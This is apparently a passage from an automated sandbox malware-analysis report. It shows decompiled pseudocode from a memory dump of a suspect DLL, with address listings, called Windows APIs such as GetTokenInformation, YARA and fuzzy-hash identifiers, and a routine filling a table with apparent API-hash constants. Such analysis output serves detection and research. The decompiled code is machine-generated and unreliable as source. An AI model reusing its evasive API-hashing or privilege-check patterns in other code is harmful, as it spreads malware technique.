                                                                                                                                      																goto L94;
                                                                                                                                      															}
                                                                                                                                      														}
                                                                                                                                      														__eflags = _t385;
                                                                                                                                      														if(_t385 == 0) {
                                                                                                                                      															E73231070(_t389, _t395, _t389);
                                                                                                                                      														}
                                                                                                                                      														goto L98;
                                                                                                                                      													} else {
                                                                                                                                      														_t405 = 0;
                                                                                                                                      														__eflags = 0;
                                                                                                                                      														while(1) {
                                                                                                                                      															_t278 = E73232F94(0xd0443458, 0x713d44b5, 0xd0443458, 0xd0443458);
                                                                                                                                      															__eflags = _t278;
                                                                                                                                      															if(_t278 != 0) {
                                                                                                                                      																break;
                                                                                                                                      															}
                                                                                                                                      															_t405 = _t405 + 1;
                                                                                                                                      															__eflags = _t405 -  *_t421;
                                                                                                                                      															if(_t405 <  *_t421) {
                                                                                                                                      																continue;
                                                                                                                                      															} else {
                                                                                                                                      																goto L92;
                                                                                                                                      															}
                                                                                                                                      															goto L130;
                                                                                                                                      														}
                                                                                                                                      														_push( *((intOrPtr*)(_t421 + 4 + _t405 * 8)));
                                                                                                                                      														_push( *(_t424 + 0x1ac));
                                                                                                                                      														asm("int3");
                                                                                                                                      														return _t278;
                                                                                                                                      													}
                                                                                                                                      												}
                                                                                                                                      											}
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      								} else {
                                                                                                                                      									L10:
                                                                                                                                      									__eflags =  *((char*)(_t424 + 0x18));
                                                                                                                                      									if( *((char*)(_t424 + 0x18)) != 0) {
                                                                                                                                      										E7322BC00(_t424 + 0x14);
                                                                                                                                      									}
                                                                                                                                      									goto L12;
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      					} else {
                                                                                                                                      						_push(_t408);
                                                                                                                                      						asm("int3");
                                                                                                                                      						return _t155;
                                                                                                                                      					}
                                                                                                                                      				} else {
                                                                                                                                      					L81:
                                                                                                                                      					return _t152;
                                                                                                                                      				}
                                                                                                                                      				L130:
                                                                                                                                      			}







































































                                                                                                                                      0x732307cc
                                                                                                                                      0x732307cd
                                                                                                                                      0x732307ce
                                                                                                                                      0x732307d0
                                                                                                                                      0x732307db
                                                                                                                                      0x732307dd
                                                                                                                                      0x732307e4
                                                                                                                                      0x73231063
                                                                                                                                      0x73231069
                                                                                                                                      0x73231069
                                                                                                                                      0x732307ee
                                                                                                                                      0x732307fa
                                                                                                                                      0x73230806
                                                                                                                                      0x7323080b
                                                                                                                                      0x73230818
                                                                                                                                      0x73230822
                                                                                                                                      0x73230829
                                                                                                                                      0x7323082e
                                                                                                                                      0x73230832
                                                                                                                                      0x73230836
                                                                                                                                      0x7323083b
                                                                                                                                      0x7323083e
                                                                                                                                      0x73230844
                                                                                                                                      0x7323084a
                                                                                                                                      0x73230857
                                                                                                                                      0x7323085e
                                                                                                                                      0x73230865
                                                                                                                                      0x73230868
                                                                                                                                      0x7323086b
                                                                                                                                      0x7323086d
                                                                                                                                      0x73230879
                                                                                                                                      0x73230886
                                                                                                                                      0x73230893
                                                                                                                                      0x73230895
                                                                                                                                      0x73230897
                                                                                                                                      0x73230923
                                                                                                                                      0x73230923
                                                                                                                                      0x73230929
                                                                                                                                      0x7323092c
                                                                                                                                      0x73230931
                                                                                                                                      0x73230934
                                                                                                                                      0x7323094c
                                                                                                                                      0x7323094d
                                                                                                                                      0x7323094d
                                                                                                                                      0x7323094d
                                                                                                                                      0x73230951
                                                                                                                                      0x7323095a
                                                                                                                                      0x7323095f
                                                                                                                                      0x7323095f
                                                                                                                                      0x73230961
                                                                                                                                      0x73230972
                                                                                                                                      0x73230994
                                                                                                                                      0x73230996
                                                                                                                                      0x73230997
                                                                                                                                      0x7323099b
                                                                                                                                      0x7323099b
                                                                                                                                      0x732309a4
                                                                                                                                      0x732309b0
                                                                                                                                      0x732309b9
                                                                                                                                      0x732309cf
                                                                                                                                      0x732309df
                                                                                                                                      0x732309e4
                                                                                                                                      0x732309e8
                                                                                                                                      0x732309ed
                                                                                                                                      0x732309ef
                                                                                                                                      0x73230a3f
                                                                                                                                      0x73230a54
                                                                                                                                      0x73230a58
                                                                                                                                      0x73230a5d
                                                                                                                                      0x73230a6e
                                                                                                                                      0x73230a83
                                                                                                                                      0x73230a87
                                                                                                                                      0x73230a8c
                                                                                                                                      0x73230a8e
                                                                                                                                      0x73230ad5
                                                                                                                                      0x73230ad8
                                                                                                                                      0x73230b26
                                                                                                                                      0x73230b29
                                                                                                                                      0x00000000
                                                                                                                                      0x73230b2b
                                                                                                                                      0x73230b2b
                                                                                                                                      0x73230b2e
                                                                                                                                      0x00000000
                                                                                                                                      0x73230b30
                                                                                                                                      0x73230b34
                                                                                                                                      0x73230b39
                                                                                                                                      0x73230b3e
                                                                                                                                      0x73230b40
                                                                                                                                      0x73230b44
                                                                                                                                      0x73230b46
                                                                                                                                      0x73230b4d
                                                                                                                                      0x73230b4d
                                                                                                                                      0x73230b48
                                                                                                                                      0x73230b48
                                                                                                                                      0x73230b4b
                                                                                                                                      0x73230b51
                                                                                                                                      0x73230b51
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73230b4b
                                                                                                                                      0x73230b53
                                                                                                                                      0x73230b55
                                                                                                                                      0x73230b58
                                                                                                                                      0x73230b58
                                                                                                                                      0x73230b55
                                                                                                                                      0x73230b5d
                                                                                                                                      0x73230b67
                                                                                                                                      0x73230b67
                                                                                                                                      0x73230b2e
                                                                                                                                      0x73230ada
                                                                                                                                      0x73230ada
                                                                                                                                      0x73230adc
                                                                                                                                      0x73230b1b
                                                                                                                                      0x73230b1e
                                                                                                                                      0x73230e90
                                                                                                                                      0x73230e95
                                                                                                                                      0x73230e9a
                                                                                                                                      0x73230e9c
                                                                                                                                      0x73230ea0
                                                                                                                                      0x73230ea2
                                                                                                                                      0x73230ea9
                                                                                                                                      0x73230ea9
                                                                                                                                      0x73230ea4
                                                                                                                                      0x73230ea4
                                                                                                                                      0x73230ea7
                                                                                                                                      0x73230ead
                                                                                                                                      0x73230ead
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73230ea7
                                                                                                                                      0x73230eaf
                                                                                                                                      0x73230eb1
                                                                                                                                      0x73230eb4
                                                                                                                                      0x73230eb4
                                                                                                                                      0x73230eb1
                                                                                                                                      0x73230eb9
                                                                                                                                      0x73230ec3
                                                                                                                                      0x73230b24
                                                                                                                                      0x00000000
                                                                                                                                      0x73230b24
                                                                                                                                      0x73230ade
                                                                                                                                      0x73230ae2
                                                                                                                                      0x73230ae7
                                                                                                                                      0x73230aec
                                                                                                                                      0x73230aee
                                                                                                                                      0x73230af2
                                                                                                                                      0x73230af4
                                                                                                                                      0x73230afb
                                                                                                                                      0x73230afb
                                                                                                                                      0x73230af6
                                                                                                                                      0x73230af6
                                                                                                                                      0x73230af9
                                                                                                                                      0x73230aff
                                                                                                                                      0x73230aff
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73230af9
                                                                                                                                      0x73230b01
                                                                                                                                      0x73230b03
                                                                                                                                      0x73230b06
                                                                                                                                      0x73230b06
                                                                                                                                      0x73230b03
                                                                                                                                      0x73230b0b
                                                                                                                                      0x73230b15
                                                                                                                                      0x73230b15
                                                                                                                                      0x73230adc
                                                                                                                                      0x73230a90
                                                                                                                                      0x73230a90
                                                                                                                                      0x73230a92
                                                                                                                                      0x73230b6a
                                                                                                                                      0x73230b6e
                                                                                                                                      0x73230b73
                                                                                                                                      0x73230b78
                                                                                                                                      0x73230b7a
                                                                                                                                      0x73230b7e
                                                                                                                                      0x73230b80
                                                                                                                                      0x73230b87
                                                                                                                                      0x73230b87
                                                                                                                                      0x73230b82
                                                                                                                                      0x73230b82
                                                                                                                                      0x73230b85
                                                                                                                                      0x73230b8b
                                                                                                                                      0x73230b8b
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73230b85
                                                                                                                                      0x73230b8d
                                                                                                                                      0x73230b8f
                                                                                                                                      0x73230b92
                                                                                                                                      0x73230b92
                                                                                                                                      0x73230b8f
                                                                                                                                      0x73230b97
                                                                                                                                      0x73230b97
                                                                                                                                      0x73230b99
                                                                                                                                      0x73230a98
                                                                                                                                      0x73230a9c
                                                                                                                                      0x73230aa1
                                                                                                                                      0x73230aa6
                                                                                                                                      0x73230aa8
                                                                                                                                      0x73230aac
                                                                                                                                      0x73230aae
                                                                                                                                      0x73230ab5
                                                                                                                                      0x73230ab5
                                                                                                                                      0x73230ab0
                                                                                                                                      0x73230ab0
                                                                                                                                      0x73230ab3
                                                                                                                                      0x73230ab9
                                                                                                                                      0x73230ab9
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73230ab3
                                                                                                                                      0x73230abb
                                                                                                                                      0x73230abd
                                                                                                                                      0x73230ac0
                                                                                                                                      0x73230ac0
                                                                                                                                      0x73230abd
                                                                                                                                      0x73230ac5
                                                                                                                                      0x73230acf
                                                                                                                                      0x73230acf
                                                                                                                                      0x73230a92
                                                                                                                                      0x732309f1
                                                                                                                                      0x732309f5
                                                                                                                                      0x732309fa
                                                                                                                                      0x732309ff
                                                                                                                                      0x73230a01
                                                                                                                                      0x73230a05
                                                                                                                                      0x73230a07
                                                                                                                                      0x73230a0e
                                                                                                                                      0x73230a0e
                                                                                                                                      0x73230a09
                                                                                                                                      0x73230a09
                                                                                                                                      0x73230a0c
                                                                                                                                      0x73230a12
                                                                                                                                      0x73230a12
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73230a0c
                                                                                                                                      0x73230a14
                                                                                                                                      0x73230a16
                                                                                                                                      0x73230a19
                                                                                                                                      0x73230a19
                                                                                                                                      0x73230a16
                                                                                                                                      0x73230a1e
                                                                                                                                      0x73230a28
                                                                                                                                      0x73230a28
                                                                                                                                      0x73230936
                                                                                                                                      0x73230938
                                                                                                                                      0x73230938
                                                                                                                                      0x73230ba2
                                                                                                                                      0x73230ba5
                                                                                                                                      0x73230baa
                                                                                                                                      0x73230bac
                                                                                                                                      0x73230bb5
                                                                                                                                      0x73230bc1
                                                                                                                                      0x73230bc4
                                                                                                                                      0x73230c92
                                                                                                                                      0x73230c9a
                                                                                                                                      0x00000000
                                                                                                                                      0x73230bca
                                                                                                                                      0x73230bd4
                                                                                                                                      0x73230be6
                                                                                                                                      0x73230be8
                                                                                                                                      0x73230bea
                                                                                                                                      0x73230c76
                                                                                                                                      0x73230c76
                                                                                                                                      0x73230c78
                                                                                                                                      0x73230c7c
                                                                                                                                      0x73230c87
                                                                                                                                      0x73230c7e
                                                                                                                                      0x73230c7e
                                                                                                                                      0x73230c7e
                                                                                                                                      0x00000000
                                                                                                                                      0x73230bf0
                                                                                                                                      0x73230bfc
                                                                                                                                      0x73230bfe
                                                                                                                                      0x73230c00
                                                                                                                                      0x7323104f
                                                                                                                                      0x73231054
                                                                                                                                      0x73231056
                                                                                                                                      0x00000000
                                                                                                                                      0x7323105c
                                                                                                                                      0x00000000
                                                                                                                                      0x7323105c
                                                                                                                                      0x73230c06
                                                                                                                                      0x73230c06
                                                                                                                                      0x73230c17
                                                                                                                                      0x73230c1b
                                                                                                                                      0x73230c20
                                                                                                                                      0x73230c32
                                                                                                                                      0x73230c34
                                                                                                                                      0x73230c36
                                                                                                                                      0x73230c4d
                                                                                                                                      0x73230c4f
                                                                                                                                      0x73230c51
                                                                                                                                      0x73230ec9
                                                                                                                                      0x73230ec9
                                                                                                                                      0x73230c51
                                                                                                                                      0x73230c57
                                                                                                                                      0x73230c5e
                                                                                                                                      0x73230c60
                                                                                                                                      0x73230edb
                                                                                                                                      0x73230ef1
                                                                                                                                      0x73230ef3
                                                                                                                                      0x73230ef5
                                                                                                                                      0x73231030
                                                                                                                                      0x73231037
                                                                                                                                      0x00000000
                                                                                                                                      0x73230efb
                                                                                                                                      0x73230f04
                                                                                                                                      0x73230f12
                                                                                                                                      0x73230f2c
                                                                                                                                      0x73230f2e
                                                                                                                                      0x73230f30
                                                                                                                                      0x73231041
                                                                                                                                      0x73231046
                                                                                                                                      0x73231048
                                                                                                                                      0x00000000
                                                                                                                                      0x7323104a
                                                                                                                                      0x00000000
                                                                                                                                      0x7323104a
                                                                                                                                      0x73230f36
                                                                                                                                      0x73230f36
                                                                                                                                      0x73230f44
                                                                                                                                      0x73230f4f
                                                                                                                                      0x73230f5e
                                                                                                                                      0x73230f70
                                                                                                                                      0x73230f72
                                                                                                                                      0x73230f74
                                                                                                                                      0x73230f81
                                                                                                                                      0x73230f81
                                                                                                                                      0x73230f91
                                                                                                                                      0x73230fa2
                                                                                                                                      0x73230fa7
                                                                                                                                      0x73230fa9
                                                                                                                                      0x73230fbf
                                                                                                                                      0x73230fe0
                                                                                                                                      0x73230fe9
                                                                                                                                      0x73230ff5
                                                                                                                                      0x73231001
                                                                                                                                      0x73231006
                                                                                                                                      0x7323100b
                                                                                                                                      0x73231011
                                                                                                                                      0x73231011
                                                                                                                                      0x73231016
                                                                                                                                      0x7323101c
                                                                                                                                      0x00000000
                                                                                                                                      0x73231022
                                                                                                                                      0x73231024
                                                                                                                                      0x73230c9d
                                                                                                                                      0x73230ca9
                                                                                                                                      0x73230cb0
                                                                                                                                      0x73230cb2
                                                                                                                                      0x73230cbc
                                                                                                                                      0x73230cbc
                                                                                                                                      0x73230cbe
                                                                                                                                      0x73230cc0
                                                                                                                                      0x73230ccf
                                                                                                                                      0x73230cdb
                                                                                                                                      0x73230cdf
                                                                                                                                      0x73230ce2
                                                                                                                                      0x73230ce5
                                                                                                                                      0x73230ce8
                                                                                                                                      0x00000000
                                                                                                                                      0x73230ce8
                                                                                                                                      0x73230fab
                                                                                                                                      0x73230fab
                                                                                                                                      0x73230fb2
                                                                                                                                      0x73230fb3
                                                                                                                                      0x73230fb3
                                                                                                                                      0x73230fa9
                                                                                                                                      0x73230f30
                                                                                                                                      0x73230c66
                                                                                                                                      0x73230c66
                                                                                                                                      0x73230c66
                                                                                                                                      0x73230c6b
                                                                                                                                      0x73230c71
                                                                                                                                      0x73230c71
                                                                                                                                      0x00000000
                                                                                                                                      0x73230c6b
                                                                                                                                      0x73230c60
                                                                                                                                      0x73230c00
                                                                                                                                      0x73230bea
                                                                                                                                      0x7323089d
                                                                                                                                      0x732308a9
                                                                                                                                      0x732308ab
                                                                                                                                      0x732308ad
                                                                                                                                      0x73230e7a
                                                                                                                                      0x73230e7f
                                                                                                                                      0x73230e81
                                                                                                                                      0x00000000
                                                                                                                                      0x73230e87
                                                                                                                                      0x00000000
                                                                                                                                      0x73230e87
                                                                                                                                      0x732308b3
                                                                                                                                      0x732308b3
                                                                                                                                      0x732308c4
                                                                                                                                      0x732308c8
                                                                                                                                      0x732308cd
                                                                                                                                      0x732308da
                                                                                                                                      0x732308e1
                                                                                                                                      0x732308e3
                                                                                                                                      0x732308fa
                                                                                                                                      0x732308fc
                                                                                                                                      0x732308fe
                                                                                                                                      0x73230cf6
                                                                                                                                      0x73230cf6
                                                                                                                                      0x732308fe
                                                                                                                                      0x73230904
                                                                                                                                      0x7323090b
                                                                                                                                      0x7323090d
                                                                                                                                      0x73230d05
                                                                                                                                      0x73230d16
                                                                                                                                      0x73230d1b
                                                                                                                                      0x73230d1d
                                                                                                                                      0x73230d1f
                                                                                                                                      0x73230e50
                                                                                                                                      0x73230e54
                                                                                                                                      0x00000000
                                                                                                                                      0x73230d25
                                                                                                                                      0x73230d2b
                                                                                                                                      0x73230d50
                                                                                                                                      0x73230d52
                                                                                                                                      0x73230d54
                                                                                                                                      0x73230e6c
                                                                                                                                      0x73230e71
                                                                                                                                      0x73230e73
                                                                                                                                      0x00000000
                                                                                                                                      0x73230e75
                                                                                                                                      0x00000000
                                                                                                                                      0x73230e75
                                                                                                                                      0x73230d5a
                                                                                                                                      0x73230d5a
                                                                                                                                      0x73230d65
                                                                                                                                      0x73230d6c
                                                                                                                                      0x73230d73
                                                                                                                                      0x73230d7a
                                                                                                                                      0x73230d7b
                                                                                                                                      0x73230d7c
                                                                                                                                      0x73230d8e
                                                                                                                                      0x73230d90
                                                                                                                                      0x73230d92
                                                                                                                                      0x00000000
                                                                                                                                      0x73230d98
                                                                                                                                      0x73230d9a
                                                                                                                                      0x73230db5
                                                                                                                                      0x73230db7
                                                                                                                                      0x73230db9
                                                                                                                                      0x73230e5e
                                                                                                                                      0x73230e63
                                                                                                                                      0x73230e65
                                                                                                                                      0x00000000
                                                                                                                                      0x73230e67
                                                                                                                                      0x00000000
                                                                                                                                      0x73230e67
                                                                                                                                      0x73230dbf
                                                                                                                                      0x73230dbf
                                                                                                                                      0x73230dbf
                                                                                                                                      0x73230dc6
                                                                                                                                      0x73230dca
                                                                                                                                      0x73230e35
                                                                                                                                      0x73230e35
                                                                                                                                      0x73230e37
                                                                                                                                      0x73230e3e
                                                                                                                                      0x73230e3e
                                                                                                                                      0x73230e39
                                                                                                                                      0x73230e39
                                                                                                                                      0x73230e3c
                                                                                                                                      0x73230e42
                                                                                                                                      0x73230e42
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73230e3c
                                                                                                                                      0x73230e44
                                                                                                                                      0x73230e46
                                                                                                                                      0x73230e4b
                                                                                                                                      0x73230e4b
                                                                                                                                      0x00000000
                                                                                                                                      0x73230dcc
                                                                                                                                      0x73230dcc
                                                                                                                                      0x73230dcc
                                                                                                                                      0x73230dce
                                                                                                                                      0x73230dda
                                                                                                                                      0x73230ddf
                                                                                                                                      0x73230de1
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73230e2f
                                                                                                                                      0x73230e30
                                                                                                                                      0x73230e33
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73230e33
                                                                                                                                      0x73230de3
                                                                                                                                      0x73230de7
                                                                                                                                      0x73230dee
                                                                                                                                      0x73230def
                                                                                                                                      0x73230def
                                                                                                                                      0x73230dca
                                                                                                                                      0x73230db9
                                                                                                                                      0x73230d92
                                                                                                                                      0x73230d54
                                                                                                                                      0x73230913
                                                                                                                                      0x73230913
                                                                                                                                      0x73230913
                                                                                                                                      0x73230918
                                                                                                                                      0x7323091e
                                                                                                                                      0x7323091e
                                                                                                                                      0x00000000
                                                                                                                                      0x73230918
                                                                                                                                      0x7323090d
                                                                                                                                      0x732308ad
                                                                                                                                      0x7323082b
                                                                                                                                      0x7323082b
                                                                                                                                      0x7323082c
                                                                                                                                      0x7323082d
                                                                                                                                      0x7323082d
                                                                                                                                      0x73230ceb
                                                                                                                                      0x73230ceb
                                                                                                                                      0x73230cf5
                                                                                                                                      0x73230cf5
                                                                                                                                      0x00000000

                                                                                                                                      APIs
                                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,D0443458,D0443458), ref: 732308FA
                                                                                                                                      • GetSystemInfo.KERNELBASE(?,4BCC7CBA,4BCC7CBA,?,?,F3453DD0,?,?,DB1D9B48,?,?,05411B30,00000000,80000002,00000000,-000000FC), ref: 73230CBC
                                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,D0443458,D0443458,00000000,D0443458,D0443458), ref: 73230D50
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InformationToken$InfoSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 298373132-0
                                                                                                                                      • Opcode ID: ce4b03d1afc4d5d418bd22b2650486062c2b36222929281e967629db85eebcf7
                                                                                                                                      • Instruction ID: 2db8700f6ced2c287cebbf72bbdbb6fc56a504677b864c6efde0b09878c10e8c
                                                                                                                                      • Opcode Fuzzy Hash: ce4b03d1afc4d5d418bd22b2650486062c2b36222929281e967629db85eebcf7
                                                                                                                                      • Instruction Fuzzy Hash: 0522E3B0608345AFE721DB20C840BAF77AAAF86704F94C919E59B5B191DBB0D8C5C763
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 31%
                                                                                                                                      			E73221494(intOrPtr __ecx, void* __edx, void* __eflags) {
                                                                                                                                      				intOrPtr _v40;
                                                                                                                                      				intOrPtr _v60;
                                                                                                                                      				void* _v68;
                                                                                                                                      				char _v72;
                                                                                                                                      				char _v76;
                                                                                                                                      				char _v80;
                                                                                                                                      				char _v84;
                                                                                                                                      				char _v88;
                                                                                                                                      				char _v92;
                                                                                                                                      				char _v96;
                                                                                                                                      				char _v100;
                                                                                                                                      				char _v104;
                                                                                                                                      				char _v108;
                                                                                                                                      				char _v112;
                                                                                                                                      				char _v116;
                                                                                                                                      				char _v120;
                                                                                                                                      				char _v124;
                                                                                                                                      				char _v128;
                                                                                                                                      				char _v132;
                                                                                                                                      				char _v136;
                                                                                                                                      				char _v140;
                                                                                                                                      				char _v144;
                                                                                                                                      				char _v148;
                                                                                                                                      				char _v152;
                                                                                                                                      				char _v156;
                                                                                                                                      				char _v160;
                                                                                                                                      				char _v164;
                                                                                                                                      				char _v168;
                                                                                                                                      				char _v172;
                                                                                                                                      				char _v176;
                                                                                                                                      				char _v180;
                                                                                                                                      				char _v184;
                                                                                                                                      				char _v188;
                                                                                                                                      				char _v192;
                                                                                                                                      				char _v196;
                                                                                                                                      				char _v200;
                                                                                                                                      				char _v204;
                                                                                                                                      				char _v208;
                                                                                                                                      				char _v212;
                                                                                                                                      				char _v216;
                                                                                                                                      				char _v220;
                                                                                                                                      				char _v224;
                                                                                                                                      				char _v228;
                                                                                                                                      				char _v232;
                                                                                                                                      				char _v236;
                                                                                                                                      				char _v240;
                                                                                                                                      				char _v244;
                                                                                                                                      				char _v248;
                                                                                                                                      				char _v252;
                                                                                                                                      				char _v256;
                                                                                                                                      				char _v260;
                                                                                                                                      				char _v264;
                                                                                                                                      				char _v268;
                                                                                                                                      				char _v272;
                                                                                                                                      				char _v276;
                                                                                                                                      				void* _v288;
                                                                                                                                      				intOrPtr _v292;
                                                                                                                                      				char _v296;
                                                                                                                                      				char _v300;
                                                                                                                                      				char _v304;
                                                                                                                                      				char _v308;
                                                                                                                                      				char _v312;
                                                                                                                                      				char _v316;
                                                                                                                                      				char _v320;
                                                                                                                                      				char _v324;
                                                                                                                                      				char _v340;
                                                                                                                                      				char _v344;
                                                                                                                                      				char _v348;
                                                                                                                                      				char _v352;
                                                                                                                                      				char _v356;
                                                                                                                                      				void* __ebp;
                                                                                                                                      				void* _t282;
                                                                                                                                      				intOrPtr* _t310;
                                                                                                                                      				intOrPtr* _t318;
                                                                                                                                      				intOrPtr* _t434;
                                                                                                                                      				intOrPtr* _t480;
                                                                                                                                      				void* _t481;
                                                                                                                                      
                                                                                                                                      				_t481 = __eflags;
                                                                                                                                      				_t480 =  &_v60;
                                                                                                                                      				_v40 = __ecx;
                                                                                                                                      				_v76 = 0;
                                                                                                                                      				E7322F620( &_v72, 0);
                                                                                                                                      				_v60 = 0x22dc1034;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				asm("movq [ecx+0x18], xmm0");
                                                                                                                                      				E7322F8C4( &_v76, E7322F568( &_v76) + 0x10);
                                                                                                                                      				E7322F558( &_v80, E7322F568( &_v80) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v88 = _v88 + 1;
                                                                                                                                      				_t325 =  &_v84;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v84 + 0x10)) = 0x853cdd04;
                                                                                                                                      				asm("movq [ecx+0x18], xmm0");
                                                                                                                                      				E7322F8C4( &_v84, E7322F568(_t325) + 0x10);
                                                                                                                                      				E7322F558( &_v88, E7322F568( &_v88) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v96 = _v96 + 1;
                                                                                                                                      				_t329 =  &_v92;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v92 + 0x10)) = 0xb162dc4e;
                                                                                                                                      				asm("movq [ecx+0x18], xmm0");
                                                                                                                                      				E7322F8C4( &_v92, E7322F568(_t329) + 0x10);
                                                                                                                                      				E7322F558( &_v96, E7322F568( &_v96) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v104 = _v104 + 1;
                                                                                                                                      				_t333 =  &_v100;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v100 + 0x10)) = 0xc15ccc53;
                                                                                                                                      				asm("movq [ecx+0x18], xmm0");
                                                                                                                                      				E7322F8C4( &_v100, E7322F568(_t333) + 0x10);
                                                                                                                                      				E7322F558( &_v104, E7322F568( &_v104) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v112 = _v112 + 1;
                                                                                                                                      				_t337 =  &_v108;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v108 + 0x10)) = 0xc8fc2de6;
                                                                                                                                      				asm("movq [ecx+0x18], xmm0");
                                                                                                                                      				E7322F8C4( &_v108, E7322F568(_t337) + 0x10);
                                                                                                                                      				E7322F558( &_v112, E7322F568( &_v112) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v120 = _v120 + 1;
                                                                                                                                      				_t341 =  &_v116;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v116 + 0x10)) = 0x7d07f92f;
                                                                                                                                      				asm("movq [ecx+0x18], xmm0");
                                                                                                                                      				E7322F8C4( &_v116, E7322F568(_t341) + 0x10);
                                                                                                                                      				E7322F558( &_v120, E7322F568( &_v120) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v128 = _v128 + 1;
                                                                                                                                      				_t345 =  &_v124;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v124 + 0x10)) = 0xfc7fa539;
                                                                                                                                      				asm("movq [ecx+0x18], xmm0");
                                                                                                                                      				E7322F8C4( &_v124, E7322F568(_t345) + 0x10);
                                                                                                                                      				E7322F558( &_v128, E7322F568( &_v128) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v136 = _v136 + 1;
                                                                                                                                      				_t349 =  &_v132;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v132 + 0x10)) = 0x4145240a;
                                                                                                                                      				asm("movq [ecx+0x18], xmm0");
                                                                                                                                      				E7322F8C4( &_v132, E7322F568(_t349) + 0x10);
                                                                                                                                      				E7322F558( &_v136, E7322F568( &_v136) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v144 = _v144 + 1;
                                                                                                                                      				_t353 =  &_v140;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v140 + 0x10)) = 0x2c2324e8;
                                                                                                                                      				asm("movq [ecx+0x18], xmm0");
                                                                                                                                      				E7322F8C4( &_v140, E7322F568(_t353) + 0x10);
                                                                                                                                      				E7322F558( &_v144, E7322F568( &_v144) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v152 = _v152 + 1;
                                                                                                                                      				_t357 =  &_v148;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v148 + 0x10)) = 0xf06b4c6b;
                                                                                                                                      				asm("movq [ecx+0x18], xmm0");
                                                                                                                                      				E7322F8C4( &_v148, E7322F568(_t357) + 0x10);
                                                                                                                                      				E7322F558( &_v152, E7322F568( &_v152) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v160 = _v160 + 1;
                                                                                                                                      				_t361 =  &_v156;
                                                                                                                                      				asm("pxor xmm0, xmm0");
